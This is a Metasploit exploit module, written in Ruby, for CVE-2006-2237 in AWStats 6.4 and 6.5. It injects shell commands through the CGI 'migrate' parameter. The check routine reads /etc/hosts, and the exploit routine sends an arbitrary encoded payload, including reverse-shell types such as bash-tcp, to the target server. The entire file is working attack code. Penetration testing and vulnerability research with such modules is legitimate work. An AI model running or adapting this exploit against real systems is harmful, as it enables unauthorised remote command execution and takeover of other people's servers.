1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'AWStats migrate Remote Command Execution',
16
        'Description' => %q{
17
          This module exploits an arbitrary command execution vulnerability in the
18
          AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based
19
          payloads are recommended with this module. The vulnerability is only
20
          present when AllowToUpdateStatsFromBrowser is enabled in the AWStats
21
          configuration file (non-default).
22
        },
23
        'Author' => [ 'aushack' ],
24
        'License' => MSF_LICENSE,
25
        'References' => [
26
          ['CVE', '2006-2237'],
27
          ['OSVDB', '25284'],
28
          ['BID', '17844'],
29
          ['URL', 'http://awstats.sourceforge.net/awstats_security_news.php'],
30
          ['EDB', '1755'],
31
        ],
32
        'Privileged' => false,
33
        'Payload' => {
34
          'DisableNops' => true,
35
          'Space' => 512,
36
          'Compat' =>
37
                        {
38
                          'PayloadType' => 'cmd cmd_bash',
39
                          'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
40
                        }
41
        },
42
        'Platform' => 'unix',
43
        'Arch' => ARCH_CMD,
44
        'Targets' => [[ 'Automatic', {}]],
45
        'DisclosureDate' => '2006-05-04',
46
        'DefaultTarget' => 0,
47
        'Notes' => {
48
          'Reliability' => UNKNOWN_RELIABILITY,
49
          'Stability' => UNKNOWN_STABILITY,
50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
51
        }
52
      )
53
    )
54

55
    register_options(
56
      [
57
        OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]),
58
        OptString.new('AWSITE', [true, "The AWStats config site name", "demo"]),
59
      ]
60
    )
61
  end
62

63
  def check
64
    res = send_request_cgi({
65
      'uri' => normalize_uri(datastore['URI']),
66
      'vars_get' =>
67
        {
68
          'migrate' => "|echo;cat /etc/hosts;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"
69
        }
70
    }, 25)
71

72
    if (res and res.body.match(/localhost/))
73
      return Exploit::CheckCode::Vulnerable
74
    end
75

76
    return Exploit::CheckCode::Safe
77
  end
78

79
  def exploit
80
    command = Rex::Text.uri_encode("cd /tmp &&" + payload.encoded)
81
    sploit = normalize_uri(datastore['URI']) + "?migrate=|echo;echo%20YYY;#{command};echo%20YYY;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"
82

83
    res = send_request_raw({
84
      'uri' => sploit,
85
      'method' => 'GET',
86
      'headers' =>
87
        {
88
          'Connection' => 'Close',
89
        }
90
    }, 25)
91

92
    if (res)
93
      print_status("The server returned: #{res.code} #{res.message}")
94

95
      m = res.body.match(/YYY\n(.*)\nYYY/m)
96

97
      if (m)
98
        print_status("Command output from the server:")
99
        print("\n" + m[1] + "\n\n")
100
      else
101
        print_status("This server may not be vulnerable")
102
      end
103
    else
104
      print_status("No response from the server")
105
    end
106
  end
107
end
108

109